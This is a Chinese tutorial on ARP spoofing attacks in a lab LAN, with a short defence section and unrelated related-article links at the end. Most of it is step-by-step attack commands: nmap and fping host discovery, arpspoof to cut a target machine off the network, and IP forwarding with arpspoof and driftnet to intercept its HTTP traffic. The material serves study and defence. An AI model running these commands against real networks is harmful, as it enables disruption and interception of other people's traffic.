局域网内的攻击—Arp欺骗

news/2024/11/30 7:40:54/

0x00:ARP协议

在局域网中,网络中实际传输的是“”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。MAC地址就是ARP协议获得的。其实就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。所以说从某种意义上讲ARP协议是工作在更低于IP协议的协议层。这也是为什么ARP欺骗更能够让人在神不知鬼不觉的情况下出现网络故障,危害会很隐蔽。

0x01:ARP欺骗原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

当局域网中一台机器,反复向其他机器,特别是向网关,发送这样无效假冒的ARP应答信息包时,严重的网络堵塞就会开始。由于网关MAC地址错误,所以从网络中计算机发来的数据无法正常发到网关,自然无法正常上网。这就造成了无法访问外网的问题,由于很多时候网关还控制着我们的局域网LAN上网,所以这时我们的LAN访问也就出现问题了。

0x02:断网攻击

可以使用nmap命令寻找存活主机

nmap -sP 192.168.186.*

在这里插入图片描述

也可以使用fping探测一下

fping -asg 192.168.186.0/24

在这里插入图片描述
使用命令查看一下当前的网关

cat /etc/resolv.conf

在这里插入图片描述
查看当前win7的IP地址,确实是存在131的IP
在这里插入图片描述
在攻击前可以先看一下目标机的ARP缓存
在这里插入图片描述
ping一下百度的域名
在这里插入图片描述
可以ping通百度,说明目标主机的网络环境没有问题。

下面开始断网攻击,使用arpspoof工具,工具使用方法:

arpspoof   -i   网卡   -t    目标IP    网关

如果下载了但还是没有这个arpspoof命令,就说明没有加入到环境变量中,修改一下就好了

export PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin"

Linux修改环境变量

开启断网攻击

arpspoof -i eth0 -t 192.168.186.131 192.168.186.2

在这里插入图片描述
观察目标主机,已经ping不通百度
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
停止攻击,再次查看
在这里插入图片描述
说明断网攻击已经成功

0x03:ARP欺骗(不断网)

ARP欺骗攻击是冒充网关向目标主机发送假的ARP数据包。

攻击流程

  1. 获取目标主机的流量
  2. 获取流量之后进行转发

相当于一个中间人,可以在中途拦截一下流量,这样所有的流量都会被监控,

开启IP转发功能

cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward(转发)
#echo 代表写入
这样可以实现流量转发,而不是截断流量
如果要截断流量,写入0即可
#截断流量
echo 0 >/proc/sys/net/ipv4/ip_forward(断网)

欺骗攻击

arpspoof -i eth0 -t 192.168.186.2 192.168.186.131  
#网关在前,IP在后

接下来打开另一个终端,使用一下

driftnet -i eth0 

在这里插入图片描述
经过测试,只能捕捉目标主机在浏览HTTP网站的时候可以拦截流量,访问HTTPS则不行。

这里稍微补充一下HTTP和HTTPS

  1. HTTP是一种发布和接收 HTML 页面的方法,被用于在 Web 浏览器和网站服务器之间传递信息。
  2. HTTP 协议以明文方式发送内容,不提供任何方式的数据加密,如果攻击者截取了Web浏览器和网站服务器之间的传输报文,就可以直接读懂其中的信息。
  3. HTTPS 经由 HTTP 进行通信,但利用 SSL/TLS 来加密数据包。HTTPS 开发的主要目的,是提供对网站服务器的身份认证,保护交换数据的隐私与完整性。
  4. HTTPS(SSL+HTTP) 数据传输过程是加密的,安全性较好。

0x03:如何进行防御

  • ARP 高速缓存超时设置

在ARP高速缓存中的表项一般都要设置超时值,缩短这个这个超时值能够有用的避免ARP表的溢出。

  • 静态ARP缓存表

每台主机都有一个暂时寄存IP-MAC的对应表ARP攻击就经过更改这个缓存来到达诈骗的意图,运用静态的ARP来绑定正确的MAC是一个有用的办法,在命令行下运用arp -a能够检查当时的ARP缓存表。

  • 自动查询

在某个正常的时间,做一个IP和MAC对应的数据库,以后定时检查当时的IP和MAC对应联系是否正常,定时检查交流机的流量列表,检查丢包率。


http://www.ppmy.cn/news/747003.html

相关文章

黑客是否可以通过入侵家庭Wi-Fi来进入个人手机并窃取手机文件?

入侵家庭wifi和窃取手机文件这里面需要执行几件重要事情:分析wifi流量 突破流量、突破权限。 入侵wifi这种是一个比较常见的攻击方式,可以通过入侵路由器然后管控路由器中的wifi,通过成功入侵wifi后,就可以访问该网络设备中所有链…

1月第2周业务风控关注 | 微信打击盗用他人的身份恶意注册,去年处理300多万例

易盾业务风控周报每周报道值得关注的安全技术和事件,包括但不限于内容安全、移动安全、业务安全和网络安全,帮助企业提高警惕,规避这些似小实大、影响业务健康发展的安全风险。 1、上海市网信办依法处置“白富美研究中心”等6个违规微信公众…

利用微信企业号发送报警信息

开发环境 操作系统:CentOS 7.4 Python版本 :3.6 模块:json,requests 1. 微信企业号设置 1.1 企业号注册 微信企业号注册是免费的而且无需企业认证,大家放心使用 注册地址: https://mp.weixin.qq.com/ 点击企业微信并填写信息 1.2 企业号设置 注册好之后我们…

网络安全之 ARP 欺骗防护

ARP 协议 什么是 MAC 地址 MAC 地址是固化在网卡上的网络标识,由 Ieee802 标准规定。 什么是广播 向同一个网段内的设备,发送数据包,广播 IP 地址是同网段最后一个 IP 地址。 认识 ARP 协议 ARP 的全称是地址解析协议,我们通…

警惕!又一起网络钓鱼攻击事件:Uniswap被盗810万美元

2022年7月12日,Uniswap V3 平台遭受了网络钓鱼攻击。据Tokenview数据显示,攻击者已盗取7,573枚ETH,价值约810万美元。 CZ预警 Binance首席执行官CZ发推提醒,黑客在Uniswap V3平台上窃取了4,295枚ETH。最初CZ将这次攻击解释为Uni…

黑客可通过伪Wi-Fi信号窃取用户数据

网络研究人员证明,黑客可以通过一种利用Wi-Fi信号作为隐蔽通道的新颖技术从气隙隔离的计算机中窃取敏感数据,这令人惊讶的是,不需要在目标系统上使用Wi-Fi硬件。 该攻击被称为“ AIR-FI ”,其攻击在于在受感染的系统中部署经过特殊…

WiFi 协议漏洞可用于劫持网络流量

聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 网络安全公司的研究员在 IEEE 802.11 WiFi 协议标准中发现一个根本性漏洞,可导致攻击者诱骗访问点以明文形式泄漏网络框架。 WiFi 框架是由表头、数据payload 和封装尾组成的数…

IP地址被盗用解决方案

盗用IP地址也算是屡见不鲜的事情了,在IPV4的时代,IP地址是一种稀缺的资源,也由此衍生了盗用IP地址的做法;到到了IPV6时代,IPV6地址个数为16^322^128个,大约是3.4E38,以地球目前的容量来看&#…